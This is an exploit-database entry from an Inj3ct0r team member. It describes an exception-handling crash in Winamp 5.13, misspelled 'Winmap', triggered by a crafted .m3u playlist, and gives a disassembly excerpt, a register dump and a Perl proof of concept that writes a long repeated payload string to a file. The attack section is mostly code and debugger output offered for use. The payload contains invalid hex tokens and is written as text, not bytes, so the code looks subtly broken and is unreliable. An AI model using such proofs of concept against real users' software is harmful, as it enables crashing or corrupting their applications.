Winmap 5.13 Full- Exception Handling Vulnerablity



EKU-ID: 2363 CVE: OSVDB-ID:
Author: Dark-Puzzle Published: 2012-06-26 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 0      _                   __           __       __                      1
 1    /' \            __  /'__`\        /\ \__  /'__`\                    0
 0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
 1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
 0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
 1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
 0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
 1                   \ \____/ >> Exploit database separated by exploit    0
 0                    \/___/          type (local, remote, DoS, etc.)     1
 1                                                                        1
 0   [x] Official Website: http://www.1337day.com                         0
 1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
 0                                                                        0
 1               ==========================================               1
 0                   Dark-Puzzle From Inj3ct0r TEAM                       1
 1               ==========================================               0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
# Exploit Title: Winmap 5.13 Full- Exception Handling Vulnerablity .
# Author: Dark-Puzzle
# Category : Local Exploit
# Software Link : http://www.oldapps.com/winamp.php?old_winamp=214?download
# Date: 25 June 2012
# Version: 5.13 Full Version , previous versions may be vulnerable .
# Tested on: Windows Xp Sp2 .

----------------------------------------------------------
Understanding the exploit :

*Executing file.m3u in Winamp 5.13 Full .

*After debugging the program , I discovered that this was an Exception Handling error
by Access Violation . registred in [EAX] Memory . Not By Division by zero here.

diasembly
                              
7C928FCE  |.  57            PUSH EDI
7C928FCF  |.  1BC0          SBB EAX,EAX
7C928FD1  |.  F7D0          NOT EAX
7C928FD3  |.  25 40C1987C   AND EAX,7C98C140
7C928FD8  |.  8BF8          MOV EDI,EAX
7C928FDA  |.  8B46 10       MOV EAX,DWORD PTR DS:[ESI+10]
7C928FDD  |.  3BC3          CMP EAX,EBX
7C928FDF  |.  8945 FC       MOV DWORD PTR SS:[LOCAL.1],EAX
7C928FE2  |.  0F84 9E000000 JE 7C929086
7C928FE8  |>  8B06          MOV EAX,DWORD PTR DS:[ESI]
7C928FEA  |.  FF40 10       INC DWORD PTR DS:[EAX+10] <<---- Access Violation

Registers :

-------------
EAX 35206534
-------------
ECX 00000000
EDX 00487D00 
EBX 00000000
ESP 00D7FE00
EBP 00D7FE74
ESI 00487D00 
EDI 00000000
-------------
EIP 7C928FEA ntdll.7C928FEA
-------------



Error : Access Violation when writing to [35206544] - Application was unable to process exception .
Access Violation. Unhandle exception in winmap.exe 

The Thing here is that EAX registered 35206534 ,
but the access violation was in [35206544] . Because , as we see here "INC DWORD PTR DS:[EAX+10]."

We can fill some nops in our exploitation code , but I prefer not .

-------------------------------------------------------------------

PoC : 
#!/usr/bin/perl
my $file = "dark.m3u";
my $cr = "4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f";
open ($File, ">$file");
print $File $cr;
close ($File);

-----------------------------------------------------------------
A memorry corruption vulnerability maybe possible . 
-----------------------------------------------------------------

Dark-Puzzle (Souhail) .
Follow me : fb.me/dark.puzzle
Follow Moroccan Cyber Army : https://www.facebook.com/MAR.Cyber.Army

Greetz to : M.C.A , Team-Hunter , Jigs@w , All Inj3ct0r team Members ....

GREY HAT Mercy .